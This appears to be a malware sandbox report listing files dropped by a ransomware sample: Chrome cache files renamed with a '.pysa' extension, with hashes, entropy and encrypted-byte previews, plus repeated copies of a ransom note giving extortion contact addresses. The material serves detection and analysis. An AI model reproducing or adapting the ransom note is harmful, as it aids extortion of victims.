                  Preview: ..$.......I..g&..*8L...6M.v.g.a............Q....G.Y..c~.Ov9.......x...a.....I.OnO!..R......`O.!...89a.Q.]].b....2c'i.)....=.KRr...,.`.G..vY..<........z4....O...t...._?(u...ZZ..z#.Fp...?.R.Cqn[.87..6.....:.g.7.....:..(...m.>..R...=.|...F1.U'...........!R.F.d..T...@.......~0..G..a..w......f.7...g.8......H~.VrmL.....El2|....H..u.C..h.y....7..ac../&.^....x.....)r....T{jO.o.{..J.*.....r.U....sOI..N.._..5/xV......jP.d..?.4...;..&~.N`Z.w....k6.Y.$..7...o.g..IU.. .2..x i&c....f.....cMCC,.........W0.M..q^.m..#.u..D.d..En..kwr...n. .^..8.f...]...=.69C`x..(5A.......H.}A......A.(j.Q~...#.S...Ao...q....$u..*.:.u.....$I.t.fo......P...6.(..?.+3......b.8Q....M..d>.g.m*wJ..:....tEk....ZsK.X,._.t.:B...m.io..ic..&....M.*..K'n..x...{.ZZ.....y...v....%..6.. ...7..._.?V.G.{..\z.A._P.P@.4C.`"...{..h<e!z.X.....Z.pw.*.~.A...'R4v0...^.*..W~Qg8..m..ClT6..#.0v..e>.H.....^..@..U.H....v.......M......IcYR....'..)...B....oZ...qd.h...........a5x..cN...,..s.9a...C.._
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\data_3.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4200448
                  Entropy (8bit):7.999949417676622
                  Encrypted:true
                  SSDEEP:98304:gtKl64cMjfzv+yy729gg8mlImWauJwbf2AwchVpuIfoyY6zEhDiB:XlbcMTzTlSm+mWGbf9wchVgxegM
                  MD5:A3726299D1FB3EE6E35BBD80E1D96FEF
                  SHA1:47C836A90D89A7C95409A0C2288CBB114DC6FDDF
                  SHA-256:9768DE1BE9FBFC4B28B60E5510C1C97E170C49814668E69A715584C4BD3A78E5
                  SHA-512:990B3EC1E498A88C85A8489EBFBBCCCF606B30D3853CD36F76BDE387E21F256D67297A4AFB3BA89C354EE8F153AD7DEE3CCE883B17AEB4DE9B27027BDE438B69
                  Malicious:false
                  Preview: ...nw.X4...@j.^.svi.U/b.....i..*.`1(@AYGe..........K..s.6|.Q3.[.6.<..........!A'..6B...s\R...L.3V..WQ..0.*...G.....+r.D.|.m...N.E.`.........f....hP~i.|...Ue..+....K....c.s..n_..J.*Q...T...~d'.e.....bF...v0.....w....<p_,.sFc...X`w.=........7....]...^...L.1.%.J......:x.I.R.\..K...6uW....I........P{..%.|.<t.(S?N..A9.....1.*..F.xO..0...g....e.g`.4..@H.y....].x..._.....p.o..#..khr..:3.E.. `.........S|....+.u.H^...=.X..H\....9..@...-.F..^..s.....y.y....[[......... .".I...q..GMF.F..W.a..=3.....Pu...<..L.l...#.d...... ...x....5.$.....b.mo.k.P.....E.W...i.....<.....z..~kZ..I.*.....d.q...CAw..dR/./.....y......f`V...|b}..}..\...x... ...K..3.._5Q.8m.2.aL...B{..T...y ....-(..kh.....n.. P0t.6H.I..z..w`=..S..W.d..].x.U.a..e.......@.c.X./....1A..x.....;.hoNXh#.x.!k.Ch..z..J..:la.'.8.A)V...6..BrDe~....j,.L..n97.}M0...&B...m..{.S.r..Lv.2...6'.|..._..M...L&..(2...s.M}.1..../w.s\.#vW.A...........e..K.....e.r......'=DzI...0.....lA..V.."#!.j-o.R...'.....E.._.G.
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000001.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):79872
                  Entropy (8bit):7.9916887676357415
                  Encrypted:true
                  SSDEEP:1536:aRvehGZAZ9i1Ex0b8vYS8dJi0QpjbiUX7HBU/GGTppK8zeldTPEbiAzqh:wWAAQa04vYS8L8jeUX7HBU3pKssEbi+m
                  MD5:3A51097A1D6CCD88B57B3EBE8E36D6FD
                  SHA1:B252B506B56F11CE5AA0DE5AC67FBEBC791F539C
                  SHA-256:48DF4BDDF691F0EBDC603C00B628040829710205ABA61CE7ED11F7AAB354868A
                  SHA-512:991F9631B99E3098418A7AEC13F24773BAA9E3D58C1C56272A1231C11DA9A33C9D8869652F7EAB9AF2A138AC5A62D0C4397B55524F500A17D37792A8D73E1351
                  Malicious:false
                  Preview: Z.....,k.?w..6.-R..)$.[Q,2....#{sh..vk!D...mn....Q....a.f.uK.+.{...$x......r."1.e..W..s..4.1hB.p,;.Q.<...If,...=...=.T.......2nt.-...v..@%..q[.R.f..B).....r,.*?....h.:...nt..Nd3N.h...?.|....M.,Zb......H:R.+..tq..w.z.p.%`..<Tm~....."y..p.....}.3..;...U..&g.......X..k....M.T.4b_....)..W.!..x.4..z*....R....B.d..H......S).....gh9u.....K;)......*.h.n5..P...VQL...;.....?.../c...c..\jih..av.Ihv.,....1...^..v......}..T..x...Q...O.I.Q:...X.....A..;]...%.......L.D.../T(...n..cQ.....,../..Y.C..].&...I?..%8vBO...K5....B.Q.\..g.........c.....jC..@..@.u..@.[&".[....jOI......S..Q.......\.*.Z....bb.._.f...j.q.o.b...~G5..so..S..T.@....;.bd.Y.l'g.#.*@5.fP205..gO....L...R../....,,d...#.HT....@.7.Q...N{h....cT...67D..Pq.Ve..j.f.D3...#nz.......&.t....t.e..*".......J..`.......\/..N..^7. ..6...$K.....@..Ro.&...R.r..w.7q.u...&..<...f`8...Q...:..\......K..3.>.. (T...v.`l....+......"...y....f.xD......q.|..hg......B...G.......j..6q..l..t.~...0{q%B4.a`/D..$.
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000003.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):36864
                  Entropy (8bit):7.968018841192595
                  Encrypted:false
                  SSDEEP:768:YCktg44Q636+KlW73eGEjOPRElupifvRr4NPVAuNYd3We/OYmBUV7/a:YCSgTQ6K+kWbeGOOulupg4HAuNw3Wer+
                  MD5:7A7D58BDAD92991BA5496079D641500E
                  SHA1:66B7A9BC0117782E7C21F749A6838E01608C8795
                  SHA-256:044FBE5581774C40914EF2DD985147FCD4CF10E0179211D05D3479B93A1E43D6
                  SHA-512:B9C59A2FA5ABFBC08E46DE3C3E71AA33C99AB58EF90F794A9767C284E06BA99C767BF15135F1D7F808DEBA2BCDAC75A96F6F14588D276C0BCFADE5796A1BE9C7
                  Malicious:false
                  Preview: ..H.(...eI..a.....=l.;..... ....z..j..f...g.U8.2u.;.4. ..)T.*.w.g..Z..]......+..4.i.2...V.2.......8..y..lS."}(..3J..<....P..U...D......<..x..r{....IG..$..=...Y+n....v...d:BF..8gg.O....;.dv!f|..v.K.......4......b...E.R._x!...1.._...........I3G..|8..$9g.aS@..D....)..?>gV.n....bP..O..B..D.).B..nh.1M...R.g....kDv..b.Z,Ps*..c..h.....4.*A....r..{..P..3.c..I.^7...&Im>...l.8...n...3....2\..b../.X;PRC..D....^0...)MH..p..5.u.Yr..a6.....Q.-..k...+u..]r^..5H...N.wP.y..7..+j.Y2..:.....^ad-i.%C./..Q.S.....6sdk...h..(.:..]..&......d.CP:......}.A.3T/p..+.....L.7".o....4."%.1...y'$.(..pD.u.~....._.%j.o..{.....I..:..`......z.%...0.I.n{.N54P..A/e*.f..H.....Fa.9.....}.-.3.~n...F......x..x..x.R-..0d.ml.Pvs.f.4..87....".l.s.c.p.........7n.s...&/.Zr.~...WHr.MR.g.R.s.!.l.c...`....,5..z....3...'.."...I.1"...-.A..:C..p.....nQk4..G........(.)<*.0.KH2`.......j....n......Ko.Ji.*92..i..H.......#...=..s.AwN..=1#o.[........Vy ...,.Hw.N...\W..=U.*."...
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000004.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):35840
                  Entropy (8bit):7.966527581036419
                  Encrypted:false
                  SSDEEP:768:7o2ytEuxkrgWKOUUBNbm8MFD0smCxT/JMrtQ9iBU3chq56LWN:M2yeuxk5va/mCVQe9iaX56qN
                  MD5:F9F3BE291DDAA55F08135E3FAA517493
                  SHA1:704564727A43D3499CF229772348ED4060A59A24
                  SHA-256:B1C3A419289348537227E8E11442527CD20C27A685D9B6C6EF73C0E1FB1BC721
                  SHA-512:C29996890FA51B6FCEDCA1AEC933B9734D9627DE473AC3A0F164A4DE913A58435A9BE82502A2750BC374286597C78FD2C539CCF3BC48E82B9E0D4CAA0D1A4E59
                  Malicious:false
                  Preview: ...P!.5.y.8.6MZ|..P..)..*....c..F.R.N..`.@.`.f.#..w........<c`..T.?E.N"..9..>h.BL...PsJ.Gd.....z.m..4*D1.w....vg.....S.......~.&a.PE[z*K..:.U.R./.......$..e.....k.ki.s/.Q..{F.ATLK.E...*....}g.(#$.="...&,.|"1....*ah..,D....i<_:.L..DG.]s''.N.....2rH......L..]k.z.^s...<.......d..huZ...I..<.6...'..b.j.........hva..%..../u..a..7<!...2.lc..g....KQIu...yeA.pW..H(.L...*r#4+b..x.\!.d).g.^.>.....;.....k..F?..#&.gR.?.E"<.o...d.E......<96..&...`a?.:.."q3.M..y.A._F..$O.>I...:.......D..p.)..u.,....[g.S.fM...".[w#...HEO....z./$...:./N..S......x3...~w[|...%^.3S........x...wI........6./.5.w|.L.r.nKH['o..H..c.-...].S...E.f..C.)}.MO.._Wf<.:...~.b.....N.fN..9.d.6G;..{8.n....hB*~.gh...:.B.>B..O.f}......u!.......y.Ha.Cq>n3..........x..Hv....F @.F.s...S.......6....y....e,t...b.n.U\...v.C....0|.VS....{..H.....=..c.n.:{...w ...(...+aN:..w|...L>@.....x...:+.p,a..h.<....@...YF.}>.E+.s>d.YH.S.z...q.7Q..{......z'...B....At}.. .+.......fW......m..e.r..Ne^.P.S)....N...s.p..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000005.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):43008
                  Entropy (8bit):7.974404377352774
                  Encrypted:false
                  SSDEEP:768:EEKyK68x4cZEOIBC7W4Jjfavh4fq0ICHjWVOa9COcmpidKMQB2r5Pa:orJEm7dJremfGOjWYjGidKer5i
                  MD5:F3B817E6B1CF18EFA077408B8FE5FED4
                  SHA1:0CAC4B32AE8CAF2C302E88A5349A2C16F7D984A0
                  SHA-256:9F14659C987DA962913A15542EB802F0C61FDE4E7ABAE6BC9ED7C9C5088B5484
                  SHA-512:37EADF672E41E64A333161EBBF29FB3560EA7AE509C9E9FD4BA1B9859444F1A8D9DC67DC38C864DFBE225BC60D00664096E209F11287E3FC9830F3ED58F7470A
                  Malicious:false
                  Preview: .XE..+X.!_..>..._<.S+`..."..$..n..V\...7...NhK..'/...4....B..H..W..B.b;.Su:.....#..e..~.w..&D3..i./...R....S..8..^....k.s!C#...:T...................X..........u.&.....j0.....1.$S.Z.}.c@...J-?u6.B.q$*....{...\.w...8Q...@..i.,...4[..E:Q..pRk.....+...R^B.9.......Aix.z.^]m.1".-g...3Ez.W.l"............>..o../....fO........\....SP..I..x.w5.....3....<~e....\....$...6X'.....E....{.>.B..+..ar....dy..~.2...R>..OB.6.P...7..S.~.h....Xv...f.PW<..T...f.....X........]O.H..R..5.O.h..-.Gu[....($.!Z.d.k*...J.Rm.}..........;.. .).?..g....3 .H.z^m...f..`.i......SK"...im..g..V?.~......+&.Y..{....[..v..E..A._....^\..U.}V.9...Z..#..&|......B.F....EuPB.S@...%...;.y...N..z.5'...|.t4.:..M.N~a.vx......|....h64.~p.....~..=.m.....|.Tf.H].....9p...S#FU.r....F.....I.%>:.5v......ti..5Hi.v..B.m..$gqO...Q.n.....d...q.e..Cf.y.0.vE..#.d.....x~{..."....O..O.......Z.L..75[>.h2..[Q...*&.z...i"..A3..V.z..D...~.dDl.B.6.Lo....4......nk..3\W0....=...#...~.i...........s..G.Fd0g....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000006.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):43008
                  Entropy (8bit):7.973804540141104
                  Encrypted:false
                  SSDEEP:768:ZTvHcfpxyKnrt04U065xYwF4FbcPmR8LJu842hZpkgtAEln/ZEp3u:RHKplnrjz6EFbzRCI84UpkgDlREp3u
                  MD5:E0AD6D20B44AC993B4B4F61F74F4228C
                  SHA1:E38B1A29C30644571BCCC1B655523F60D7B797F3
                  SHA-256:985F9127D5E70F5ACC6E4FE0465808F120CD1F1C4050BACB6DFFD5D1DE02EA8F
                  SHA-512:FB8E47B03A2D7DC858889C1EBED88C11F43D894308F806D7A7039A789E7250B4E6762547B7A77CFDF630209218064F26DB9B2AE3D2EE282AC89DABB899074F64
                  Malicious:false
                  Preview: 9...I.(...>S..J..Y...4.7..".8....$.......8T..H.xP......Fj}.I.'[.YE. W...=:..u.x.x....P=z...T.o.Z.....3..`.......b..ZK.=..8..b)..+..P.&!_t.N...b..L......[...z..4....ZL.-......k._..).&.(.dBtT_.....F....5Ys&..].%D&@..D..!......I.._..4....=........8.|...[N...}.F.5k*.b^......g..O...<.....o...3p..2G86Tf.v.! ..5.Q.Xi.v.0.....v.*..6..........H+\.s.t'...::4..U...e...a...c...(....q.H.qlk...!...H~.k.P.rn.<..B .y...x.68....2}-....L..s.8C:..YS.r0.a..H........^.....c.....5z..........~.sk.e.:j.ys.:.S.......8.g...Q$].&?.A.....w....@.>'.g.....I.?.......$&.V...(...R.n.Y$0.(.1...+..Kk.....?`w......Xu...V....`...OB..Q...T*....q..iu~.i.J..k....n.d.^].<...c.5..C....{...Vt.....>.~\{l..{u...... i|......0..'f]..H....w{...1..DI.m.#.K..H..q.w...Q.|y...`Z.CL....9.........-T.........|F....Z.y:....y.;M...6.X... ...].. .I...E.0.=...p.dk..........Uv..=.&.I../.1*..5..)tn.<.P.;y^.r-.h......O....x:..a......{8......T....e......7J.Ir.....s&.7..Gg.4...s%n...v...x.....BP.k
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000007.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):55296
                  Entropy (8bit):7.983090536655238
                  Encrypted:false
                  SSDEEP:1536:7EP59icKBERZ19QiaMxA507t9d5oPPQYsq:SBgiJxA50RGIYsq
                  MD5:B6216C454248A806DCFB539F37AE13EA
                  SHA1:F2AEB073618AC6AF1575D660C5340B3E07B0207D
                  SHA-256:A868208938A3D70E308E8484171D4AF99C29EB1A1339A18873BF6658C29574FE
                  SHA-512:30024A3CDA40EA04A1AA0855B39F373C4CD0ECB2CCED1AE2EAB0A6AC78CFE58A3FB2CB7A1A89572AC984BE678203BA69D04F489342C67229E11277C7ADA89AE4
                  Malicious:false
                  Preview: .d|.h.Hc....{.b.#.|...U.........S.j..1..B...3...1q..b.w.......'R4E...8..c...z....;_E..............R..XR.......}...>...Ub.%C.t....7...(...bM.O..:..8.U...U-..6u.Am..%.....d.r .5Ag#?~P$...!.}+..O'.}_..&..E.Ay..2.G..bf..#.n.V^..5.....\...... 3...v~............r*a..o.?.I`0......K..A.....E..8xSOz.....B.T.;J..R.L.9..WF..r.F..:..,L........f'9Fh*=Z{@..$c9...F...)K.{.-E.d@ .11(s...Z.xrH.L..[..8%}.|...S..........{...tK..]$...L..Z.......!Of.....,.N..2....M............xP.....{-S1.-7.O.G.d.[...dp..v._^........`.gz..........?.-.P.1....2.)g.g.VU...Sh.Y.....M[......SY...NN.[>..]mxJy.R.).".g.Y.3=.)m..-.w......j.....5...9........P...z...q..b..W 9[.!%!A!....1..Sa...7^m.q...1...j...S.cC.m.'I....0.#..`.kk..P.u}.9%.......x..x.Y2...h...|....m......,^e.bN.......T..e...y.}._{(F9.7..".>.........P..`.....r?i2.2|g(..aL2g9......}ws..0.sv.......p.uV..u..Bx.m....yUtO...*..........h.D.cV.'j...}.-6... ..%....;NX]K.w...aR.It......C...cEl......).=..........B.W.....*..V.Pf
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000008.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):77824
                  Entropy (8bit):7.990952175391112
                  Encrypted:true
                  SSDEEP:1536:OQmFZpjeGUgP/LZ2oGgmYAj9kKTZ8Q7FK1Vc9VWb5XhwDO/otdkg:OPRJRLIoJAje500vc9Vct2C/op
                  MD5:40ADDEE7F36F62F4F6E1C4982C49139C
                  SHA1:EA5F72B500FF09E111CAB63306D4B47BAE35FCC0
                  SHA-256:1D23CA9BE08E512023076CBAB28C56D85339DE62706799D851F344D4E984BA1B
                  SHA-512:8881412A854AB16DF322B4508657D42DBCB59B989070AEB849C2D75A7E602A4960E017221AD7A65C46C02C64EA21CE31047BE989C10525D0549D01C9B295B79F
                  Malicious:false
                  Preview: .6...-...k..Maj.....6.....l.ZR.....F.qC$.t.r.........S_.O..(r,..0..._.f..........d.T.....`..+.(...=........]l}...z..6C7pLK....w.s.V.?.....I...T..e..+....$..5...4.....ni..\O....8hU.t.t...K.....I..]$.so....._:..I....Hk?..o>x.....t...s...J|},p......_..ox..P...=p...$Z...*..;..xc.|..<s33.l...`*.22....!....B..TEX}A!....;.Q..#..E.(. y|9E...#.<..a..y../.%.......F..Mh{.yQ?..x.'z.._.$L;.}.Vj...9..A.E..~fS.P...?^P......5....c.P.../.....I!...c..0.p...u...AbL.!...V.....{.{..L&...u..2.....r@..l.(s....`....!.}..[Db...').l..v..PR;*...S.M;R.z.f..z.sy..k.<.h.g.....0..a.2....).% ..)....."...X^...A..$.{.1L.q MC....T.......o.#..<Q.(...H,.Y.p@...#E.x...Z.3./..Bm...m.....E..t.P..j$.(0......7.[...W._.r.U....n..AD .;..Ss..r.y....G8.c.U. . .b.DS.....d...X.......e.z..q8_1...n....S...L.......XP.....Rj...$..mo(.."%....#.OS7#..y1.UZ..>.V.PQ0..K.).w.0t...D..X_5.N..f..8.Yl..(...Y7{.*....pl.r...O...._(x.....b%a.G.JT/...5...\.U.=........\..|..T"..0.t~...y.c..mH..J....##).
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000009.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62464
                  Entropy (8bit):7.986124782280932
                  Encrypted:false
                  SSDEEP:1536:yPpE93RxtqWDcJKba5gjCRK5/Xt1eoooBqp6ixrNGpuXyxl6:f93btXrygjCRA/TXoHNx5j
                  MD5:87A84B4DDB80AB0890303D7AC649155E
                  SHA1:A8EE49C5FEE1519C3B47A354BE0493037F8B3E4D
                  SHA-256:ED7B2CE7BCE428251606EE4E80B9691F7CC8484842B49CA0176F7AC3A6FB5926
                  SHA-512:07BD9C232969668AE336CDD21C31461D65426C36CE8DCB6B23C916E36AB83F0AA9811CB9A2753B6373D7945B1B5DF3136E7C709E84A2F89C17FEEE515E3EFE15
                  Malicious:false
                  Preview: j....1.....x~.G..Q.....j...#w. .....:....M..0l..|...w.....V.......#....J.Xv..V.`.q......U....>..M../*e...c..s...v-p...E.^. Z..X....U..5..R.c.\....K....)..B...=../}....-T.vA.Tu..:G..2xTA....P....E.j.....[..7..v.=.[p....\.9..X=j.y.\.c+Y...x..C...3....Vn.Z.....R.b..]....3.R..w(4Eq..Nm..h.S.$4A.Do....<...6i..#jZp7&.....y.P-Y.##t.......h{...t.0....iw..$.V.......i.5..>.qQ.o.J..lR.........lP.j..5*....]....5. .....e...~p.^...).......$....(tVv.b;.._..'..w.[R .......eP..c...%.;.RB.......t.V.Ul.6. z...D....n:'b.J....,..D........Oux~E.B?.@......t(Y|.x.q..Z-E.?}..2i...e[J.h.G.<Z.#.2~.....;\....4...1....>.9.....F..+..~}..;m....%.....H ...&=.....~.....^.....F...Q.%.=:...c.|.4.G...`.l-~._5g...6.qI..`..|F..........r...I%..n.C.sKN*.....m.CJ.......}........k.w/6..G..X...kW...i?.m|_..).......g...j..!...q$..M...N.$v2.Qt..5..-.D...DYaj.RN.....m...=..0xT..:.....,4@.?{..>..[Y..K....v...........@Q.....m..5O..BQ?u.~....x....NT,...^....NW..\h.`Zr.%........_/....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\index.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):514048
                  Entropy (8bit):7.999437246348804
                  Encrypted:true
                  SSDEEP:12288:iJuvWzzJ+DiE+WNb1V5usRl9jJ9kBaGtCDOFJgJSsUNq:qWAkBTHusRvjIWOFCSI
                  MD5:4D9170A58AB00381254FB4483D48036C
                  SHA1:9FCE87D47E1928DF209A6EEF2CF05914EB5D9AB7
                  SHA-256:373DCCA024BF9A0A14A1EC54ABA04F5C9EEA73FFD3157A4E01A5751173C4DA97
                  SHA-512:FF8E07897A372327AAA637E185ED24A3D72025B64A3F11BA472E4BF671B5B318FA3DDAC8EBC9F15FDBFB33BEAECD2CE9254EFDA4ADF245970B17C87BA73B25F9
                  Malicious:false
                  Preview: *......%YK.....D...U/U#K~.......@.).K.1.'?.^..6?..SEh9.i.PW...rp.....6...|D...........I.(...>....(.).8.f^..\YV+^.i......o.A.:.........v*...c`Z.u.N..+?=h}?p'......7..e;N..S. ...G,).Q........k...3..,.uJ}..y.V_.......+.rs..4..Uy....M..`......:d.lo...q..q0.......8YEe.J3..U..q..H...dO...3....l.k.9...Ym...n&o.......;...E]..V#1c#deOC..?.....?w..Y..t.d....Rf...2.^..;o6.D.A.<_r'.~...}{lX.....v..v.'...H!N../k.....~.T.B.d....<..;.6..*.....%>z.`.d..;`o......X..yz........UnH.g2.....4....a........l....*....9.<.yQ..B.t.>q!....9..Vk.}P..y.ET.....W..B~.......Ob..\.$.WL.\......}.-XP3....&ZS.P.0B.,;....".`.p...+.....3..|#....LG!..'...".i+.l.......^...$[.......H./.......W.nA.o.-.....t......c.....A'..#"..R.H}(..5..y......vy.15....S...~....5..[..]...J...0P5..w.A=.7...B..+.l.fA.0.3./~0r....-'5.eKv.......Z...ZR.........t...%.z............3G.2..QS.xs%.m...kA_..9..A.}Ba.H#..D...% z..Lj.u.4..w7.....1.R75yM.Y.........V..=........Y.}.....;. }5..{..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2132
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbJ
                  MD5:F5F6CB683017074FC644C8E039F1ED23
                  SHA1:BB512B1BE542FB549444448E5D715BD9B0EF5489
                  SHA-256:6D18BE05DC3A0BFE38098A6AA6BBBED5D79201E74284A476607D8393034966E6
                  SHA-512:D826D55297D01C40684AED444646C1890978B8C177CA8667C9BB646331AAC98C7644A45435003263C807FE0DA3098DB04684CC5320B851DC623CAD59C4B70A73
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2132
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbJ
                  MD5:F5F6CB683017074FC644C8E039F1ED23
                  SHA1:BB512B1BE542FB549444448E5D715BD9B0EF5489
                  SHA-256:6D18BE05DC3A0BFE38098A6AA6BBBED5D79201E74284A476607D8393034966E6
                  SHA-512:D826D55297D01C40684AED444646C1890978B8C177CA8667C9BB646331AAC98C7644A45435003263C807FE0DA3098DB04684CC5320B851DC623CAD59C4B70A73
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\fc9785cdcbaea0b7_0.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):7.994594102904921
                  Encrypted:true
                  SSDEEP:3072:4r3dW6dB2GiomgO6mGp0rA8Ed0KFLq18pz:4zdW6RU73Gar3Ed0KFLqGJ
                  MD5:735E723D5128E8C2A9C7F86A2EEA7F80
                  SHA1:59531598ACB67B01A7A872A4B30BA3B1CAD0DFC5
                  SHA-256:D5C503698CD13C97683022833E660BB9885833F5F4B8940F0C3B705EFCF0EEB0
                  SHA-512:AE0B13D3E89129E0B3EFB3FDD4EDC20978780BAA670991B9B2E3488A9E92D1CC75A9168D6B31AEACC17D25351057FD91FC9693BE261B5C5ABC87B06686D39B87
                  Malicious:true
                  Preview: $.v..3m....3.k.S.s<.._.a.$=.G .a}.~.s..XKN...n.F..ZE....=..:U.3...Nf....Ff.'.. .g.?.@'.U....+.c6..D..3\.a...K.....dC.>....@(..q..D..K].O5M..!.K..Z....U..!...`..(z..9..v7.?......Fc}...8p..j....a....c....Kb?.Lz..[7e8..U.&9c..Y..h.Rb9.^:pC|\..XI.m.....N...TO1....."\...z$...~.\e.K.'.[.....K.k...P.tk'.(...Q.;\P..mel.L..Zi... K.... ...[,wi.W..SN......dsd..86....]l.#.Hu.......>4.v.mA...gJ)RL.D..g.v%&...'>.......4..{...f...@.?.[>.....`.#%.....A.n.....K...8.....,.H................|./..IX.I....C...@...l.`x...2i&......0.|...%..c..e....N.=.O....}f.\...S.k.-.q.<Q....>..sk.w.=..@...\.^..Ia. .oP.g.....G..2`...9..+..~..::.-4..$...=B..Q5.`..W].C..p......fm.....V.6........XY.."..!.l(.%K..nvy.D...M...^...[B.Zp..u.=..Z.<.U.R..'9.D'Z.xw..F.....M.-...cn..)N.[V=.>.e....\. ....c..5..*_4Y......1...\..8...O.mn6U...K.n.YE..Wj.FT..<...0.......t...5.......W..P..Y.X.-......K..Ng.P...r.........xV..........~.>^<N.78..N.....CK`.P....'.b.}...7I.*%.r...)..@.5.C..=km.`
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\Readme.README
